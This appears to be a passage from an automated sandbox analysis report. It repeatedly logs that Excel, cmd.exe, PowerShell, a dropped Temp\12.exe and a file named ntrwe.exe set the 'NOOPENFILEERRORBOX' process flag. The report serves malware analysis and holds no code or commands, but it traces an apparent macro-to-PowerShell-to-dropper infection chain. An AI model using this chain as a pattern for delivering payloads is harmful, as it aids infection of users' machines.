                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\ntrwe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
